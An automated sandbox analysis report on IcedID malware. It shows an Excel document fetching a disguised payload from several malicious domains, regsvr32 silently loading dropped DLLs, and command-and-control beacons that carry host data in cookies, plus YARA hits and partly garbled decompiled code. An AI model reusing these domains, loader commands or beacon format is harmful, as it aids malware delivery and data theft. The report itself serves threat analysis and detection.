                                                                                                                                                                                                              Jul 6, 2021 15:34:26.486752033 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.486768961 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.487456083 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.487510920 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.507380009 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.507384062 CEST4434917413.224.92.73192.168.2.22

                                                                                                                                                                                                              UDP Packets


                                                                                                                                                                                                              DNS Queries


                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                              Jul 6, 2021 15:34:25.099754095 CEST8.8.8.8192.168.2.220xc330No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.099754095 CEST8.8.8.8192.168.2.220xc330No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.184917927 CEST8.8.8.8192.168.2.220x6848No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.184917927 CEST8.8.8.8192.168.2.220x6848No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.184917927 CEST8.8.8.8192.168.2.220x6848No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.584774017 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.584774017 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.654561043 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.654561043 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• thousandsyears.download
• voopeople.fun
• uppercilio.fun
• astrocycle.download

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 172.67.198.51 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:34:15.474013090 CEST | 0 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: thousandsyears.download
Connection: Keep-Alive
Jul 6, 2021 15:34:15.524545908 CEST | 2 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 13:34:15 GMT
Content-Type: application/octet-stream
Content-Length: 57856
Connection: keep-alive
Content-Disposition: attachment; filename=lsdfik.fml
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 5885
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NQa%2FToNAe4OfSycDITeTcPRjCr99aolaLqyUrPFMG%2FPw1ZIxGpsbT0mJx%2FvTchvs%2BxnkydQR5YNN1ucst5YESuFDECWoL7Oed1NuA59e7643MxlLh0PYHC8Rt9YvlJfrDvHmcm4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a935a2ea894e3d-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 104.21.12.122 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:34:15.707076073 CEST | 63 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: voopeople.fun
Connection: Keep-Alive
Jul 6, 2021 15:34:15.761357069 CEST | 64 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 13:34:15 GMT
Content-Type: application/octet-stream
Content-Length: 57856
Connection: keep-alive
Content-Disposition: attachment; filename=lsdfik.fml
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 5884
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Br5qITmK7KR5WQ%2BEK2GUF2OhhE7oHZy%2BBwGeVnakesJB4CD5KzwejZeo0P7vlpLpiZAX1mffAGTgFj1rIfVTNTMySqnj%2FLTQ8o21f3gYa3WSAFzGyLaJ9qmj9A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a935a45e4a4a92-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 104.21.55.83 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:34:15.941987991 CEST | 125 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: uppercilio.fun
Connection: Keep-Alive
Jul 6, 2021 15:34:16.023370028 CEST | 126 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 13:34:16 GMT
Content-Type: application/octet-stream
Content-Length: 57856
Connection: keep-alive
Content-Disposition: attachment; filename=lsdfik.fml
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 5884
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tdPcIrAE2vvRZYKG1Z8MC4h5F2uk1HO2YqdWJntIaNZoAwTqS6xEVG4oGGJckRbzpb9ReFxkZ%2F6BeyScK5hi57sdBxfviydzcXbmfgwcCsJ5BcBTSQ9zc0B04Gc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a935a5daf92c2a-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49171 | 172.67.213.115 | 80 | C:\Windows\System32\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:34:19.246521950 CEST | 445 | OUT | GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=3565085024:1:5201:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:31303745413343414446434341313538; __io=0; _gid=67AFEDC5AC03
Host: astrocycle.download
Jul 6, 2021 15:34:19.831310987 CEST | 446 | IN | HTTP/1.1 404 Not Found
Date: Tue, 06 Jul 2021 13:34:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=V0ys7aYdAOjPlkJGrObNQ2tiQGLMnmitDVcOVn5a040LrNhwCvTf3xr2iKIXbxukcjSBigbt3O5XMd7BfJvv2cNF6mg2WXaP2PByGtiV8voZj8c0%2FeqFYxeWaum3sBcuGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a935ba7ccc4a61-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 15:34:19.831341028 CEST | 446 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49173 | Destination IP: 172.67.213.115 | Destination Port: 80 | Process: C:\Windows\System32\regsvr32.exe
Timestamp: Jul 6, 2021 15:34:22.977318048 CEST | kBytes transferred: 705 | Direction: OUT | Data:
GET / HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __gads=3565085024:1:5205:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:44384136334637384333384532304645; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                              Host: astrocycle.download
Timestamp: Jul 6, 2021 15:34:23.747246027 CEST | kBytes transferred: 706 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:23 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HMU1z98qz%2BVQF9KOT3FaPvckp0uHUcptWSVHzhJ9y8FG6E5%2B61fqsLq6V%2BHS0LC%2Fk%2BFVuat9dnfvR3w7v8U%2Fg44%2Bht89lsSbZgT4Rayl%2FrsuOF2ItkhiwAZzr9Rse6841g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935d1db51dffb-FRA
                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Timestamp: Jul 6, 2021 15:34:23.747273922 CEST | kBytes transferred: 706 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.22 | Source Port: 49175 | Destination IP: 172.67.213.115 | Destination Port: 80 | Process: C:\Windows\System32\regsvr32.exe
Timestamp: Jul 6, 2021 15:34:26.702739000 CEST | kBytes transferred: 964 | Direction: OUT | Data:
GET / HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __gads=3565085024:1:5209:47; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=383133383438:416C627573:32324339344139363335433034463745; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                              Host: astrocycle.download
Timestamp: Jul 6, 2021 15:34:27.475414038 CEST | kBytes transferred: 965 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:27 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=hbLm0fCkek782JLvUEF98E3orjhlZE7DgZvQLOikvpFFdnj1BgJEcdInP4X56B1O7cbHwW3Db8JcUauUiKGjIo3axkyhxQHzY5u0DeKM97TV7Ps1mcUjprh3RKNQ2X9%2Bhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935e91a132b71-FRA
                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Timestamp: Jul 6, 2021 15:34:27.475908995 CEST | kBytes transferred: 966 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0
Timestamp: Jul 6, 2021 15:34:27.475946903 CEST | kBytes transferred: 966 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              HTTPS Packets

Timestamp: Jul 6, 2021 15:34:17.194757938 CEST | Source IP: 13.224.92.73 | Source Port: 443 | Dest IP: 192.168.2.22 | Dest Port: 49170
JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
Subject | Issuer | Not Before | Not After
CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

Timestamp: Jul 6, 2021 15:34:21.657012939 CEST | Source IP: 13.224.92.73 | Source Port: 443 | Dest IP: 192.168.2.22 | Dest Port: 49172
JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
Subject | Issuer | Not Before | Not After
CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

Timestamp: Jul 6, 2021 15:34:25.273464918 CEST | Source IP: 13.224.92.73 | Source Port: 443 | Dest IP: 192.168.2.22 | Dest Port: 49174
JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
Subject | Issuer | Not Before | Not After
CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:40
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                              Imagebase:0x13f700000
                                                                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:43
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                              Imagebase:0xffc80000
                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2102276983.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:48
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                              Imagebase:0xffc80000
                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2109562092.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:33:51
                                                                                                                                                                                                              Start date:06/07/2021
                                                                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                              Imagebase:0xffc80000
                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000006.00000002.2118500619.00000000000A0000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                              Code Analysis


                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                			E002227BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                				void* __rdi;
                                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                				long long _t46;
                                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                                				intOrPtr* _t62;
                                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                                				long long* _t67;
                                                                                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                                				struct HINSTANCE__* _t79;
                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                				CHAR* _t82;
                                                                                                                                                                                                                				char* _t83;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t64 = __rsi;
                                                                                                                                                                                                                				_t46 = __rbx;
                                                                                                                                                                                                                				_t44 = _t69;
                                                                                                                                                                                                                				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                                				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                                				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                                				_push(_t62);
                                                                                                                                                                                                                				_t80 = __rcx;
                                                                                                                                                                                                                				_t83 = L"; _gid=";
                                                                                                                                                                                                                				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                                				LoadLibraryA(_t82);
                                                                                                                                                                                                                				GetProcAddress(_t79);
                                                                                                                                                                                                                				_t67 = _t44;
                                                                                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                					r9d = 1;
                                                                                                                                                                                                                					_t23 = E00222990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x2270c4, _t77, _t78);
                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                					return _t23;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t24 =  *_t67(); // executed
                                                                                                                                                                                                                				if(_t24 == 0x6f && __rbx != 0) {
                                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                                					_t9 = _t64 + 8; // 0x8
                                                                                                                                                                                                                					_t36 = _t9;
                                                                                                                                                                                                                					HeapAlloc(??, ??, ??);
                                                                                                                                                                                                                					_t62 = _t44;
                                                                                                                                                                                                                					if(_t44 == 0) {
                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t54 = _t44; // executed
                                                                                                                                                                                                                					_t27 =  *_t67(); // executed
                                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                                						_t48 = _t62;
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                                                                                                                                                                                                                								_t35 =  *((intOrPtr*)(_t48 + 0x194));
                                                                                                                                                                                                                								if(_t54 - 1 <= 7) {
                                                                                                                                                                                                                									r9d = _t35;
                                                                                                                                                                                                                									_t18 = _t48 + 0x198; // 0x198
                                                                                                                                                                                                                									_t54 = _t80 + _t64 * 2;
                                                                                                                                                                                                                									E00222990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
                                                                                                                                                                                                                									_t64 = _t64 + _t44;
                                                                                                                                                                                                                									_t83 = ":";
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t48 =  *_t48;
                                                                                                                                                                                                                						} while (_t48 != 0);
                                                                                                                                                                                                                						GetProcessHeap();
                                                                                                                                                                                                                						_t36 = 0;
                                                                                                                                                                                                                						_t23 = HeapFree(??, ??, ??);
                                                                                                                                                                                                                						if(_t64 == 0) {
                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                                					_t36 = 0;
                                                                                                                                                                                                                					HeapFree(??, ??, ??);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}























                                                                                                                                                                                                                0x0022283b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00222842
                                                                                                                                                                                                                0x00222845
                                                                                                                                                                                                                0x00222849
                                                                                                                                                                                                                0x00222894
                                                                                                                                                                                                                0x00222897
                                                                                                                                                                                                                0x0022289e
                                                                                                                                                                                                                0x002228a9
                                                                                                                                                                                                                0x002228b5
                                                                                                                                                                                                                0x002228b7
                                                                                                                                                                                                                0x002228ba
                                                                                                                                                                                                                0x002228c1
                                                                                                                                                                                                                0x002228c8
                                                                                                                                                                                                                0x002228cd
                                                                                                                                                                                                                0x002228d0
                                                                                                                                                                                                                0x002228d0
                                                                                                                                                                                                                0x002228b5
                                                                                                                                                                                                                0x002228d7
                                                                                                                                                                                                                0x002228da
                                                                                                                                                                                                                0x002228df
                                                                                                                                                                                                                0x002228e8
                                                                                                                                                                                                                0x002228ed
                                                                                                                                                                                                                0x002228f6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x002228fc
                                                                                                                                                                                                                0x0022284b
                                                                                                                                                                                                                0x00222854
                                                                                                                                                                                                                0x00222859
                                                                                                                                                                                                                0x00222859

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00222CFE,?,?,00000003,002224A4), ref: 0022280F
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00222CFE,?,?,00000003,002224A4), ref: 00222845
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                                Uniqueness

